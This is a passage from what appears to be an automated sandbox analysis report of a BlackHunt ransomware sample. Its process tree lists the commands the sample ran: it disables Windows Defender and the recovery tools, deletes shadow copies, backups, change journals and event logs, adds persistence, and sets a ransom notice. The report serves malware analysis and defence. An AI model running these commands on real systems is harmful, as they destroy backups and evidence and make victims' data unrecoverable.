3252 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 120 PID 4760 wrote to memory of 3252 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 120 PID 4760 wrote to memory of 668 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 105 PID 4760 wrote to memory of 668 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 105 PID 4760 wrote to memory of 4328 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 106 PID 4760 wrote to memory of 4328 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 106 PID 4760 wrote to memory of 2840 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 107 PID 4760 wrote to memory of 2840 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 107 PID 4760 wrote to memory of 636 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 109 PID 4760 wrote to memory of 636 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 109 PID 4760 wrote to memory of 3708 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 116 PID 4760 wrote to memory of 3708 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 116 PID 4760 wrote to memory of 3296 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 115 PID 4760 wrote to memory of 3296 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 115 PID 4760 wrote to memory of 2892 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 111 PID 4760 wrote to memory of 2892 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 111 PID 4760 wrote to memory of 1836 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 125 PID 4760 wrote to memory of 1836 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 125 PID 4760 wrote to memory of 2116 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 172 PID 4760 wrote to memory of 2116 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 172 PID 4760 wrote to memory of 3876 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 170 PID 4760 wrote to memory of 3876 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 170 PID 4760 wrote to memory of 2816 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 138 PID 4760 wrote to memory of 2816 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 138 PID 4760 wrote to memory of 2796 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 127 PID 4760 wrote to memory of 2796 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 127 PID 4760 wrote to memory of 2836 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 131 PID 4760 wrote to memory of 2836 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 131 PID 4760 wrote to memory of 4876 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 130 PID 4760 wrote to memory of 4876 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 130 PID 4760 wrote to memory of 2140 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 137 PID 4760 wrote to memory of 2140 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 137 PID 2436 wrote to memory of 5036 2436 cmd.exe 169 PID 2436 wrote to memory of 5036 2436 cmd.exe 169 PID 4760 wrote to memory of 3148 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 155 PID 4760 wrote to memory of 3148 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 155 PID 2728 wrote to memory of 4268 2728 cmd.exe 141 PID 2728 wrote to memory of 4268 2728 cmd.exe 141 PID 3832 wrote to memory of 4284 3832 cmd.exe 152 PID 3832 wrote to memory of 4284 3832 cmd.exe 152 PID 4356 wrote to memory of 380 4356 cmd.exe 142 PID 4356 wrote to memory of 380 4356 cmd.exe 142 PID 4760 wrote to memory of 1172 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 143 PID 4760 wrote to memory of 1172 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 143 PID 2308 wrote to memory of 1100 2308 cmd.exe 147 PID 2308 wrote to memory of 1100 2308 cmd.exe 147 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe"C:\Users\Admin\AppData\Local\Temp\cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4760 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:4284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:5036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:4836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:5176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:3076
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:5208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:4328
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:7640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:7672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2892
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:10292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3296
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3708
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:7296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:5348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:4284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:3724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1836
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:7660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2796
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:7128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4876
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:7040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:7008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2140
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:7060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:7080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1172
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:744
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:7052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe" /F2⤵PID:3132
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe" /F3⤵
- Creates scheduled task(s)
PID:7376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4496
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:7284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3148
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5240
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:7412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:5252
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:5228
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:5168
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5368
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3876
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:7000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:7072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5444
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5428
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5416
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5620
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:10444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5604
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:10316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:6688
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1068
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1380
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:9068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:6804
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:8228
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:12200
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:9248
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:7384
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5524
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:10468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:11680
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6268
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:10048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5308
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:10520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:6512
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11892
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:11116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:10300
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:9720
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:6064
-
-
-
